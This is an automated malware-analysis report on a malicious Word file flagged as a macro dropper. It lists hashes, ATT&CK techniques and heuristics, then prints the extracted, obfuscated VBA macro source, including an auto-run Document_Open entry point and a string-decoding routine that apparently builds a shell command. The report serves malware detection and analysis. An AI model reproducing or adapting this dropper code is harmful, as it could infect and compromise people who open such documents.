Office (OLE) malware analysis — malicious · bc8111e7b25241b1

MALICIOUS

Office (OLE)

47.5 KB Created: 2018-08-31 09:35:00 Authoring application: Microsoft Office Word First seen: 2019-04-18

MD5: 31e06e2cff44e999d671bb1cc51c4411 SHA-1: 51cfb37822f8a082e5145288a6f6875c866e1781 SHA-256: bc8111e7b25241b1cb86c0c01b1c18ed8aecc1b576b85f797b66ea1c46c549de

202 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1204.002 Malicious File

The file contains VBA macros, including a Document_Open macro that executes obfuscated code. This macro likely downloads and executes a second-stage payload, as indicated by the critical OLE_VBA_SHELL heuristic. The document body explicitly instructs the user to enable editing and content, a common lure for macro-based malware.

Heuristics 6

ClamAV: Doc.Dropper.Agent-6667838-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6667838-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
Macro/content-enable lure medium SE_ENABLE_LURE

Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4312 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	4312 bytes
SHA-256: `31358157051a7666ed2237cb5c792556585d27e2220ab635daabfd25afd530b2`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() quezhang "\" End Sub Attribute VB_Name = "gazecoel" Function adynastya() frednicole = "" giglimator = "kuhcpezU" anentanent (hooJoy21(1)) coolmark frednicole, form1.TextBox4, giglimator anentanent (hooJoy21(2)) imanoobik = "pfarm123" coolmark frednicole, form1.TextBox4, imanoobik anentanent (hooJoy21(3)) coolmark frednicole, form1.TextBox4, imanoobik anentanent (hooJoy21(4)) ANIHULAKOP = "blkscorp" coolmark frednicole, form1.TextBox4, ANIHULAKOP anentanent (hooJoy21(5)) coolmark frednicole, form1.TextBox4, ANIHULAKOP anentanent (hooJoy21(6)) coolmark frednicole, form1.TextBox4, giglimator anentanent (hooJoy21(7)) coolmark frednicole, form1.TextBox4, giglimator anentanent (hooJoy21(8)) arkPP666 = "nick112233" coolmark frednicole, form1.TextBox4, arkPP666 anentanent (hooJoy21(9)) coolmark frednicole, form1.TextBox4, arkPP666 anentanent (hooJoy21("BC")) coolmark frednicole, form1.TextBox4, "" form1.TextBox2 = frednicole End Function Function anentanent(frednicole) form1.TextBox4 = whitneybmp(frednicole) End Function Attribute VB_Name = "mcinnes1" Function whitneybmp(ninevehnineveh) siouzos7 = "" clinenug = 1 AVOHULPET clinenug, siouzos7, ninevehnineveh whitneybmp = siouzos7 End Function Function AVOHULPET(ByRef NIKNAMIP, ByRef scindcou, mespooky) cookie1979 = Len(mespooky) If NIKNAMIP <= cookie1979 Then scindcou = scindcou + xxxcraftxxx(czgorover(Mid(mespooky, NIKNAMIP, 1)), 9) NIKNAMIP = NIKNAMIP + 1 AVOHULPET NIKNAMIP, scindcou, mespooky End If End Function Function xxxcraftxxx(Hillside, ityasan1) If Hillside - ityasan1 < 1 Then xxxcraftxxx = Mid(form1.TextBox1, Len(form1.TextBox1) + Hillside - ityasan1, 1) Else xxxcraftxxx = Mid(form1.TextBox1, Hillside - ityasan1, 1) End If End Function Function czgorover(lol159) meman111 = 1 naantoot = 1 utriglis meman111, naantoot, lol159 czgorover = naantoot End Function Function utriglis(ByRef meman111, ByRef naantoot, lol159) droldemi = form1.TextBox1 cookie1979 = Len(droldemi) If NIKNAMIP < cookie1979 Then If lol159 <> Mid(droldemi, meman111, VbLet - 3) Then meman111 = meman111 + VbLet - 3 utriglis meman111, naantoot, lol159 Else naantoot = meman111 End If End If End Function Attribute VB_Name = "sibpectw" Function hooJoy21(warrenwolf) Select Case warrenwolf Case 1 hooJoy21 = "){c9})9lkasdxns""""9.,lkasdxns""""9..vh$)fjk$9" Case 2 hooJoy21 = "\-xfdj$b%9_" Case 3 hooJoy21 = ";\|\$sa4k]ms)f9xgxfs{ $sf as])""js$f; cka$""kzcvj""s\_" Case 4 hooJoy21 = "1,,5f{l52" Case 5 hooJoy21 = " s(s,,;3xfzdf4ldk)sxx9,,5f{l52" Case 6 hooJoy21 = " s(s,,3:fdg\|" Case 7 hooJoy21 = "\,,nffl8}}]]z4sx )k{})""j $/',,;:)zf)n\|" Case 8 hooJoy21 = "\,,nffl8}}]scxq]hg )k h/})""j $/',,;:,..979khf4vj""s94s$)kcj$b9zx)jj94vj""slzfn95f{l52" Case 9 hooJoy21 = " ]zf39xfzdf4ldk)sxx9,5f{l52" End Select If InStr(warrenwolf, "BC") Then hooJoy21 = " ]zf,94aj$ckaxfg""s9njccs$." End If End Function Attribute VB_Name = "sionglec" Function coolmark(ByRef vanessahal, nerycoun, GNINIART) vanessahal = vanessahal + nerycoun + GNINIART End Function Function eagleangel() eagleangel = "1" End Function Function quezhang(ByRef grayphyl) form1.TextBox3 = grayphyl End Function Attribute VB_Name = "form1" Attribute VB_Base = "0{15D68E64-E253-47E2-9ECA-47A853961B54}{17C91209-D89C-4BD8-9651-A27D73B22053}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Private Sub CommandButton1_Click() End Sub Private Sub OptionButton1_Click() End Sub Private Sub TextBox2_Change() vgh = VbGet - 2 vgh3 = form1.TextBox2 ... (truncated)

SHA-256: 31358157051a7666ed2237cb5c792556585d27e2220ab635daabfd25afd530b2

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
quezhang "\"
End Sub

Attribute VB_Name = "gazecoel"
Function adynastya()
frednicole = ""
giglimator = "kuhcpezU"
anentanent (hooJoy21(1))
coolmark frednicole, form1.TextBox4, giglimator
anentanent (hooJoy21(2))
imanoobik = "pfarm123"
coolmark frednicole, form1.TextBox4, imanoobik
anentanent (hooJoy21(3))
coolmark frednicole, form1.TextBox4, imanoobik
anentanent (hooJoy21(4))
ANIHULAKOP = "blkscorp"
coolmark frednicole, form1.TextBox4, ANIHULAKOP
anentanent (hooJoy21(5))
coolmark frednicole, form1.TextBox4, ANIHULAKOP
anentanent (hooJoy21(6))
coolmark frednicole, form1.TextBox4, giglimator
anentanent (hooJoy21(7))
coolmark frednicole, form1.TextBox4, giglimator
anentanent (hooJoy21(8))
arkPP666 = "nick112233"
coolmark frednicole, form1.TextBox4, arkPP666
anentanent (hooJoy21(9))
coolmark frednicole, form1.TextBox4, arkPP666
anentanent (hooJoy21("BC"))
coolmark frednicole, form1.TextBox4, ""

form1.TextBox2 = frednicole
End Function

Function anentanent(frednicole)
form1.TextBox4 = whitneybmp(frednicole)
End Function

Attribute VB_Name = "mcinnes1"
Function whitneybmp(ninevehnineveh)
siouzos7 = ""
clinenug = 1
AVOHULPET clinenug, siouzos7, ninevehnineveh
whitneybmp = siouzos7
End Function

Function AVOHULPET(ByRef NIKNAMIP, ByRef scindcou, mespooky)
cookie1979 = Len(mespooky)
If NIKNAMIP <= cookie1979 Then
scindcou = scindcou + xxxcraftxxx(czgorover(Mid(mespooky, NIKNAMIP, 1)), 9)
NIKNAMIP = NIKNAMIP + 1
AVOHULPET NIKNAMIP, scindcou, mespooky
End If
End Function

Function xxxcraftxxx(Hillside, ityasan1)
If Hillside - ityasan1 < 1 Then
xxxcraftxxx = Mid(form1.TextBox1, Len(form1.TextBox1) + Hillside - ityasan1, 1)
Else
xxxcraftxxx = Mid(form1.TextBox1, Hillside - ityasan1, 1)
End If
End Function

Function czgorover(lol159)
meman111 = 1
naantoot = 1
utriglis meman111, naantoot, lol159
czgorover = naantoot
End Function
  
Function utriglis(ByRef meman111, ByRef naantoot, lol159)
droldemi = form1.TextBox1
cookie1979 = Len(droldemi)
If NIKNAMIP < cookie1979 Then
    If lol159 <> Mid(droldemi, meman111, VbLet - 3) Then
    meman111 = meman111 + VbLet - 3
    utriglis meman111, naantoot, lol159
    Else
    naantoot = meman111
    End If
End If
End Function

Attribute VB_Name = "sibpectw"
Function hooJoy21(warrenwolf)
Select Case warrenwolf
Case 1
hooJoy21 = "){c9})9lkasdxns""""9.,lkasdxns""""9..vh$)fjk$9"
Case 2
hooJoy21 = "\-xfdj$b%9_"
Case 3
hooJoy21 = ";|\$sa4k]ms)f9xgxfs{ $sf as])""js$f; cka$""kzcvj""s\_"
Case 4
hooJoy21 = "1,,5f{l52"
Case 5
hooJoy21 = " s(s,,;3xfzdf4ldk)sxx9,,5f{l52"
Case 6
hooJoy21 = " s(s,,3:fdg|"
Case 7
hooJoy21 = "\,,nffl8}}]]z4sx )k{})""j $/',,;:)zf)n|"
Case 8
hooJoy21 = "\,,nffl8}}]scxq]hg )k h/})""j $/',,;:,..979khf4vj""s94s$)kcj$b9zx)jj94vj""slzfn95f{l52"
Case 9
hooJoy21 = " ]zf39xfzdf4ldk)sxx9,5f{l52"
End Select
If InStr(warrenwolf, "BC") Then
hooJoy21 = " ]zf,94aj$ckaxfg""s9njccs$."
End If
End Function

Attribute VB_Name = "sionglec"
Function coolmark(ByRef vanessahal, nerycoun, GNINIART)
vanessahal = vanessahal + nerycoun + GNINIART
End Function

Function eagleangel()
eagleangel = "1"
End Function

Function quezhang(ByRef grayphyl)
form1.TextBox3 = grayphyl
End Function

Attribute VB_Name = "form1"
Attribute VB_Base = "0{15D68E64-E253-47E2-9ECA-47A853961B54}{17C91209-D89C-4BD8-9651-A27D73B22053}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False


Private Sub CommandButton1_Click()

End Sub

Private Sub OptionButton1_Click()

End Sub

Private Sub TextBox2_Change()
vgh = VbGet - 2
vgh3 = form1.TextBox2

... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.